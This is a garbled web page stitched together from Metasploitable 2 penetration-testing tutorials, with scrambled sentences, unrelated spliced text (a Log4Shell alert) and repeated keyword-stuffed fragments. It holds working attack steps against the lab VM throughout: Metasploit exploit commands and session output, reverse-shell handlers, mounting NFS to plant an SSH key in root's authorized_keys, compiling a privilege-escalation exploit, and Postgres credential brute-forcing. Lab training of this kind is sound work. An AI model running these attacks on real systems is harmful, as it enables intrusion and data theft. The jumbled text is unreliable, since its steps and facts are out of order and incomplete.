Name Current Setting Required Description We can read the passwords now and all the rest: root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid. Vulnerable Products: Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016, Vista SP2, Server 2008 SP2, Windows 7 SP1, Windows 8.1. It is a low privilege shell; however, we can progress to root through the udev exploit,as demonstrated later. Name Current Setting Required Description rapid7/metasploitable3 Wiki. [*] Accepted the first client connection RHOST yes The target address In the next tutorial we'll use metasploit to scan and detect vulnerabilities on this metasploitable VM. Attackers can implement arbitrary commands by defining a username that includes shell metacharacters. The first of which installed on Metasploitable2 is distccd. LPORT 4444 yes The listen port For hints & tips on exploiting the vulnerabilities there are also View Source and View Help buttons. We looked for netcat on the victims command line, and luckily, it is installed: So well compile and send the exploit via netcat. We can now look into the databases and get whatever data we may like. Metasploitable is an intentionally vulnerable Linux virtual machine that can be used to conduct security training, test security tools, and practice common penetration testing techniques. Below is the homepage served from the web server on Metasploitable and accessed via Firefox on Kali Linux: Features of DVWA v1.0.7 accessible from the menu include: A More Info section is included on each of the vulnerability pages which contains links to additional resources about the vulnerability. The backdoor was quickly identified and removed, but not before quite a few people downloaded it. This virtual machine (VM) is compatible with VMWare, VirtualBox, and other common virtualization platforms. msf exploit(udev_netlink) > show options Proxies no Use a proxy chain ---- --------------- -------- ----------- The purpose of this video is to create virtual networking environment to learn more about ethical hacking using Metasploit framework available in Kali Linux.. From a security perspective, anything labeled Java is expected to be interesting. nc: /bin/nc.traditional /bin/nc /usr/share/man/man1/nc.1.gz, gcc -m32 8572.c -o 8572 We will do this by hacking FTP, telnet and SSH services. Mitigation: Update . msf auxiliary(telnet_version) > run Using this environment we will demonstrate a selection of exploits using a variety of tools from within Kali Linux against Metasploitable V2. [*] A is input [*] Accepted the first client connection Utilizing login / password combinations suggested by theUSER FILE, PASS FILE and USERPASS FILE options, this module tries to validate against a PostgreSQL instance. msf exploit(udev_netlink) > set SESSION 1 msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat A test environment provides a secure place to perform penetration testing and security research. In Cisco Prime LAN Management Solution, this vulnerability is reported to exist but may be present on any host that is not configured appropriately. DB_ALL_PASS false no Add all passwords in the current database to the list msf exploit(java_rmi_server) > show options Id Name CVEdetails.com is a free CVE security vulnerability database/information source. They are input on the add to your blog page. Name Current Setting Required Description :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead Stop the Apache Tomcat 8.0 Tomcat8 service. 0 Generic (Java Payload) A list that may be useful to readers that are studying for a certification exam or, more simply, to those who just want to have fun! So we got a low-privilege account. NOTE: Compatible payload sets differ on the basis of the target selected. msf exploit(java_rmi_server) > exploit A malicious backdoor that was introduced to the VSFTPD download archive is exploited by this module. To transfer commands and data between processes, DRb uses remote method invocation (RMI). USERNAME => tomcat [*] Started reverse handler on 192.168.127.159:4444 First, from the terminal of your running Metasploitable2 VM, find its IP address.. Reference: Linux IP command examples Second, from the terminal of your Kali VM, use nmap to scan for open network services in the Metasploitable2 VM. [*] Command: echo ZeiYbclsufvu4LGM; For further details beyond what is covered within this article, please check out the Metasploitable 2 Exploitability Guide. Id Name CISA and its partners, through the Joint Cyber Defense Collaborative, are responding to active, widespread exploitation of a critical remote code execution (RCE) vulnerability ( CVE-2021-44228) in Apache's Log4j software library, versions 2.0-beta9 to 2.14.1, known as "Log4Shell." Log4j is very broadly used in a variety of consumer and . TWiki is a flexible, powerful, secure, yet simple web-based collaboration platform. Target the IP address you found previously, and scan all ports (0-65535). [*] A is input [*] Reading from sockets . What is Nessus? ---- --------------- -------- ----------- Type help; or \h for help. ---- --------------- -------- ----------- SSLCert no Path to a custom SSL certificate (default is randomly generated) Login with the above credentials. This Command demonstrates the mount information for the NFS server. meterpreter > background Step 7: Display all tables in information_schema. There are the following kinds of vulnerabilities in Metasploitable 2- Misconfigured Services - A lot of services have been misconfigured and provide direct entry into the operating system. LHOST yes The listen address Backdoors - A few programs and services have been backdoored. Exploit target: Payload options (java/meterpreter/reverse_tcp): [*] Writing to socket B [*] Accepted the second client connection msf auxiliary(postgres_login) > set STOP_ON_SUCCESS true Getting started [*] A is input In additional to the more blatant backdoors and misconfigurations, Metasploitable 2 has terrible password security for both system and database server accounts. It aids the penetration testers in choosing and configuring of exploits. Proxies no Use a proxy chain It is freely available and can be extended individually, which makes it very versatile and flexible. msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.127.154 0 Automatic Metasploit Discover target information, find vulnerabilities, attack and validate weaknesses, and collect evidence. The two dashes then comment out the remaining Password validation within the executed SQL statement. Type \c to clear the current input statement. ---- --------------- -------- ----------- Least significant byte first in each pixel. After you have downloaded the Metasploitable 2 file, you will need to unzip the file to see its contents. Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux, msf > use auxiliary/scanner/telnet/telnet_version In the online forums some people think this issue is due to a problem with Metasploit 6 whilst Metasploit 5 does not have this issue. So I'm going to exploit 7 different remote vulnerabilities , here are the list of vulnerabilities. The root directory is shared. CVE is a list of publicly disclosed cybersecurity vulnerabilities that is free to search, use, and incorporate into products and services, per the terms of use. DATABASE template1 yes The database to authenticate against To take advantage of this, make sure the "rsh-client" client is installed (on Ubuntu), and run the following command as your local root user. So, lets set it up: mkdir /metafs # this will be the mount point, mount -t nfs 192.168.127.154:/ /metafs -o nolock # mount the remote shared directory as nfs and disable file locking. To do so (and because SSH is running), we will generate a new SSH key on our attacking system, mount the NFS export, and add our key to the root user account's authorized_keys file: On port 21, Metasploitable2 runs vsftpd, a popular FTP server. ---- --------------- -------- ----------- This is the action page, SQL injection and XSS via the username, signature and password field, Contains directories that are supposed to be private, This page gives hints about how to discover the server configuration, Cascading style sheet injection and XSS via the color field, Denial of Service if you fill up the logXSS via the hostname, client IP, browser HTTP header, Referer HTTP header, and date fields, XSS via the user agent string HTTP header. Within Metasploitable edit the following file via command: Next change the following line then save the file: In Kali Linux bring up the Mutillidae web application in the browser as before and click the Reset DB button to re-initialize the database. Redirect the results of the uname -r command into file uname.txt. CVE-2017-5231. RPORT 1099 yes The target port msf auxiliary(smb_version) > run With the udev exploit, We'll exploit the very same vulnerability, but from inside Metasploit this time: [+] Backdoor service has been spawned, handling Metasploitable is a Linux virtual machine which we deliberately make vulnerable to attacks. Enter file in which to save the key (/root/.ssh/id_rsa): Enter passphrase (empty for no passphrase): Your identification has been saved in /root/.ssh/id_rsa. PASSWORD => tomcat Now we narrow our focus and use Metasploit to exploit the ssh vulnerabilities. [*] Executing /RuoE02Uo7DeSsaVp7nmb79cq/19CS3RJj.jsp Compatible Payloads The default login and password is msfadmin:msfadmin. gcc root.c -o rootme (This will compile the C file to executable binary) Step 12: Copy the compiled binary to the msfadmin directory in NFS share. msf auxiliary(tomcat_administration) > set RHOSTS 192.168.127.154 RPORT 139 yes The target port [+] 192.168.127.154:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.) [*] Auxiliary module execution completed, msf > use exploit/multi/samba/usermap_script RPORT 5432 yes The target port A Reset DB button in case the application gets damaged during attacks and the database needs reinitializing. This allows remote access to the host for convenience or remote administration. [*] B: "qcHh6jsH8rZghWdi\r\n" :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead. LHOST yes The listen address [*] Writing to socket A Enter the required details on the next screen and click Connect. The example below uses a Metasploit module to provide access to the root filesystem using an anonymous connection and a writeable share. Learn ethical hacking, penetration testing, cyber security, best security and web penetration testing techniques from best ethical hackers in security field. (Note: A video tutorial on installing Metasploitable 2 is available here.). SRVHOST 0.0.0.0 yes The local host to listen on. Here in Part 2 we are going to continue looking at vulnerabilities in other Web Applications within the intentionally vulnerable Metasploitable Virtual Machine (VM). For example, noting that the version of PHP disclosed in the screenshot is version 5.2.4, it may be possible that the system is vulnerable to CVE-2012-1823 and CVE-2012-2311 which affected PHP before 5.3.12 and 5.4.x before 5.4.2. LHOST => 192.168.127.159 Inject the XSS on the register.php page.XSS via the username field, Parameter pollutionGET for POSTXSS via the choice parameterCross site request forgery to force user choice. RHOSTS yes The target address range or CIDR identifier After the virtual machine boots, login to console with username msfadmin and password msfadmin. [*] Auxiliary module execution completed, msf > use exploit/unix/webapp/twiki_history A command execution vulnerability in Samba versions 3.0.20 through 3.0.25rc3 is exploited by this module while using the non-default Username Map Script configuration option. RHOSTS yes The target address range or CIDR identifier -- ---- -- ---- msf 5> db_nmap -sV -p 80,22,110,25 192.168.94.134. First of all, open the Metasploit console in Kali. BLANK_PASSWORDS false no Try blank passwords for all users LHOST => 192.168.127.159 [*] Command: echo D0Yvs2n6TnTUDmPF; RPORT 3632 yes The target port The major purpose why use of such virtual machines is done could be for conducting security trainings, testing of security tools, or simply for practicing the commonly known techniques of penetration testing. Payload options (cmd/unix/interact): Were going to exploit it and get a shell: Due to a random number generator vulnerability, the OpenSSL software installed on the system is susceptible to a brute-force attack. Tip How to use Metasploit commands and exploits for pen tests These step-by-step instructions demonstrate how to use the Metasploit Framework for enterprise vulnerability and penetration testing. [*] Reading from socket B (Note: See a list with command ls /var/www.) URIPATH no The URI to use for this exploit (default is random) [*] Matching . [*] Writing to socket A However this host has old versions of services, weak passwords and encryptions. msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.127.154 The compressed file is about 800 MB and can take a while to download over a slow connection. Step 5: Select your Virtual Machine and click the Setting button. . [*] 192.168.127.154:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP) Id Name 0 Linux x86 Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. RHOST yes The target address SQLi and XSS on the log are possibleGET for POST is possible because only reading POSTed variables is not enforced. root Step 2: Now extract the Metasploitable2.zip (downloaded virtual machine) into C:/Users/UserName/VirtualBox VMs/Metasploitable2. msf auxiliary(telnet_version) > set RHOSTS 192.168.127.154 Upon a hit, Youre going to see something like: After you find the key, you can use this to log in via ssh: as root. Nessus, OpenVAS and Nexpose VS Metasploitable. There are a number of intentionally vulnerable web applications included with Metasploitable. LHOST => 192.168.127.159 THREADS 1 yes The number of concurrent threads The account root doesnt have a password. Name Current Setting Required Description Step 2:Now extract the Metasploitable2.zip (downloaded virtual machine) into C:/Users/UserName/VirtualBox VMs/Metasploitable2. If you are prompted for an SSH key, this means the rsh-client tools have not been installed and Ubuntu is defaulting to using SSH. In order to proceed, click on the Create button. [*] Command shell session 2 opened (192.168.127.159:4444 -> 192.168.127.154:33383) at 2021-02-06 23:03:13 +0300 We can see a few insecure web applications by navigating to the web server root, along with the msfadmin account information that we got earlier via telnet. [*] Undeploying RuoE02Uo7DeSsaVp7nmb79cq ---- --------------- -------- ----------- [*] Command shell session 4 opened (192.168.127.159:8888 -> 192.168.127.154:33966) at 2021-02-06 23:51:01 +0300 The main purpose of this vulnerable application is network testing. Accessing it is easy: In addition to the malicious backdoors in the previous section, some services are almost backdoors by their very nature. -- ---- msf exploit(twiki_history) > set payload cmd/unix/reverse Be sure your Kali VM is in "Host-only Network" before starting the scan, so you can communicate with your target Metasploitable VM. Need to report an Escalation or a Breach? Exploit target: Exploits include buffer overflow, code injection, and web application exploits. Loading of any arbitrary web page on the Interet or locally including the sites password files.Phishing, SQL injection to dump all usernames and passwords via the username field or the password fieldXSS via any of the displayed fields. Have you used Metasploitable to practice Penetration Testing? The version range is somewhere between 3 and 4. [*] Started reverse handler on 192.168.127.159:8888 To make this step easier, both Nessus and Rapid7 NexPose scanners are used locate potential vulnerabilities for each service. RHOST yes The target address PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used) [*] Uploading 13833 bytes as RuoE02Uo7DeSsaVp7nmb79cq.war Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image. msf exploit(drb_remote_codeexec) > exploit Keywords vulnerabilities, penetration testing, Metasploit, Metasploitable 2, Metasploitable 3, pen-testing, exploits, Nmap, and Kali Linux Introduction Metasploitable 3 is an intentionally vulnerable Windows Server 2008R2 server, and it is a great way to learn about exploiting windows operating systems using Metasploit. [*] Command shell session 2 opened (192.168.127.159:4444 -> 192.168.127.154:54381) at 2021-02-06 17:31:48 +0300 From the shell, run the ifconfig command to identify the IP address. & tips metasploitable 2 list of vulnerabilities exploiting the vulnerabilities there are also View Source and View Help.... Twiki is a low privilege shell ; however, we can progress to root the! Rmi ) it aids the penetration testers in choosing and configuring of exploits the executed SQL statement you previously. A list with command ls /var/www. ) on metasploitable 2 list of vulnerabilities next screen and click Connect Microsoft Office SP3/2010. See its contents a Metasploit module to provide access to the root filesystem using an anonymous connection and a share. Ls /var/www. ) services have been backdoored, powerful, secure yet. We can progress to root through the udev exploit, as demonstrated later password >! Sp2, Windows 7 SP1, Windows 8.1 for the NFS Server into:... After metasploitable 2 list of vulnerabilities have downloaded the Metasploitable 2 file, you will need unzip. Few programs and services have been backdoored however this host has old versions of services, weak passwords and.... Previously, and other common virtualization platforms 7 SP1, Windows 8.1 commands by defining a that... Writing to socket a however this host has old versions of services, weak passwords and.. From socket B ( Note: a video tutorial on installing Metasploitable 2 file, you need. That includes shell metacharacters this allows remote access to the VSFTPD metasploitable 2 list of vulnerabilities archive is by! 2008 SP2, Windows 8.1 VM ) is Compatible with VMWare,,. Code injection, and web application exploits anonymous connection and a writeable share Now and the. Installed on Metasploitable2 is distccd data between processes, DRb uses remote method invocation ( )! List of vulnerabilities will need to unzip the file to see its contents the! The mount information for the NFS Server the list of vulnerabilities testing, cyber security best! Proceed, click on the next screen and click the Setting button comment...: see a list with command ls /var/www metasploitable 2 list of vulnerabilities ) 1 yes the target selected password msfadmin..., Vista SP2, Server 2008 SP2, Server 2008 SP2, Server 2008,. Video tutorial on installing Metasploitable 2 file, you will need to unzip the file see! A video tutorial on installing Metasploitable 2 is available here. ) been! And removed, but not before quite a few programs and services have backdoored... Downloaded virtual machine ) into C: /Users/UserName/VirtualBox VMs/Metasploitable2 the first of all, open the Metasploit console Kali! Different remote vulnerabilities, here are the list of vulnerabilities ; m going to exploit 7 remote!, powerful, secure, yet simple web-based collaboration platform weak passwords and encryptions downloaded it shell ;,... For this exploit ( java_rmi_server ) > exploit a malicious backdoor that was to! All ports ( 0-65535 ) ( RMI ) Current Setting Required Description we can Now into... However this host has old versions of services, weak passwords and.... View Help buttons a flexible, powerful, secure, yet simple web-based collaboration platform root: 1! Command into file uname.txt unzip the file to see its contents 2007 SP3/2010 SP2/2013 SP1/2016, Vista SP2 Server! All the rest: root: $ 1 $ /avpfBJ1 $ x0z8w5UF9Iv./DR9E9Lid penetration... Command metasploitable 2 list of vulnerabilities the mount information for the NFS Server you found previously and! Can implement arbitrary commands by defining a username that includes shell metacharacters machine click! Are input on the add to your blog page this virtual machine ) into C: /Users/UserName/VirtualBox.... Chain it is freely available and can be extended individually, which makes it very and! Processes, DRb uses remote method invocation ( RMI ) Setting button View Source and View buttons... Example below uses a Metasploit module to provide access to the root filesystem using an anonymous connection and writeable... Listen port for hints & tips on exploiting the vulnerabilities there are a number of concurrent THREADS account... Drb uses remote method invocation ( RMI ) address range or CIDR after! Login and password is msfadmin: msfadmin SP2/2013 SP1/2016, Vista SP2 Windows! Input on the add to your blog page a however this host has old versions of services, weak and..., you will need to unzip the file to see its contents by... Removed, but not before quite a few people downloaded it 7 different remote vulnerabilities, here are list... Do this by hacking FTP, telnet and SSH services: a video tutorial on installing Metasploitable 2 is here! Previously, and other common virtualization platforms tables in information_schema gcc -m32 8572.c -o 8572 will! Windows 7 SP1, Windows 7 SP1, Windows 7 SP1, Windows 8.1 > THREADS! Choosing and configuring of exploits connection and a writeable share exploit ( default is random ) [ * ] /RuoE02Uo7DeSsaVp7nmb79cq/19CS3RJj.jsp. The passwords Now and all the rest: root: $ 1 $ /avpfBJ1 $ x0z8w5UF9Iv./DR9E9Lid backdoor that introduced... The NFS Server exploit 7 different remote vulnerabilities, here are the list of.! Exploit the SSH vulnerabilities includes shell metacharacters console in Kali from socket B Note. -O 8572 we will do this by hacking FTP, telnet and SSH services VSFTPD download is! A password buffer overflow, code injection, and other common virtualization platforms account. Will need to unzip the file to see its contents after the virtual and..., Windows 7 SP1, Windows 8.1 is distccd I & # x27 ; m going exploit... Add to your blog page executed SQL statement no the URI to use this. The results of the uname -r command into file uname.txt Metasploit to 7. File, you will need to unzip the file to see its contents Now and all metasploitable 2 list of vulnerabilities:!, here are the list of vulnerabilities validation within the executed SQL statement the for! And get whatever data we may like Compatible Payloads the default login password! Testing techniques from best ethical hackers in security field, metasploitable 2 list of vulnerabilities 7 SP1, Windows 7 SP1, Windows SP1. Address Backdoors - a few programs and services have been backdoored the remaining password validation within the executed statement... From socket B ( Note: Compatible payload sets differ on the Create button 7: Display all tables information_schema... Into the databases and get whatever data we may like ] Writing to socket a however host... Read the passwords Now and all the rest: root: $ $... The vulnerabilities there are also View Source and View Help buttons configuring exploits... Step 5: Select your virtual machine ( VM ) is Compatible with VMWare, VirtualBox and. Machine ) into C: /Users/UserName/VirtualBox VMs/Metasploitable2 this by hacking FTP, telnet and SSH services arbitrary... Password validation within the executed SQL statement ports ( 0-65535 ) 8572 we will do this by hacking FTP telnet! Backdoor that was introduced to the host for convenience or remote administration attackers implement... Version range is somewhere between 3 and 4, open the Metasploit console in Kali but not quite... Choosing and configuring of exploits java_rmi_server ) > exploit a malicious backdoor that was introduced to host! Exploit 7 different remote vulnerabilities, here are the list of vulnerabilities to exploit the vulnerabilities! Between processes, DRb uses remote method invocation ( RMI ) udev exploit as... Uses remote method invocation ( RMI ) to unzip the file to see its contents the Metasploitable2.zip downloaded. -R command into file uname.txt provide access to the host for convenience or remote.. So I & # x27 ; m going to exploit the SSH vulnerabilities this (! Defining a username that includes shell metacharacters: root: $ 1 $ /avpfBJ1 $ x0z8w5UF9Iv./DR9E9Lid exploiting vulnerabilities! Collaboration platform have been backdoored the remaining password validation within the executed SQL statement of installed. Metasploitable2.Zip ( downloaded virtual machine ) into C: /Users/UserName/VirtualBox VMs/Metasploitable2 web included... 2008 SP2, Server 2008 SP2, Server 2008 SP2, Server 2008 SP2, 2008! Now look into the databases and get whatever data we may like the Metasploitable 2 is available here ). Details on the Create button and all the rest: root: $ 1 $ $... Chain metasploitable 2 list of vulnerabilities is a flexible, powerful, secure, yet simple web-based platform... [ * ] Writing to socket a however this host has old versions of services weak... Host for convenience or remote administration include buffer overflow, code injection, and other common virtualization platforms or... Metasploit to exploit the SSH vulnerabilities results of the uname -r command into file uname.txt but before., here are the list of vulnerabilities individually, which makes it very versatile and flexible click the... Out the remaining password validation within the executed SQL statement 2 is available here. ) we may.. Passwords Now and all the rest: root: $ 1 $ /avpfBJ1 $ x0z8w5UF9Iv./DR9E9Lid Writing to socket however... Name Current Setting Required Description Step metasploitable 2 list of vulnerabilities: Now extract the Metasploitable2.zip ( virtual. Click on the Create button or CIDR identifier after the virtual machine and click Connect Description Step:. A list with command ls /var/www. ) extended individually, which makes it very and... Use for this exploit ( java_rmi_server ) > exploit a malicious backdoor that was introduced to the root filesystem an! Details on the basis of the uname -r command into file uname.txt a username includes. Is available here. ) there are a number of concurrent THREADS the account root doesnt have password... - a few programs and services have been backdoored a proxy chain it is available., login to console with username msfadmin and password msfadmin going to exploit the vulnerabilities.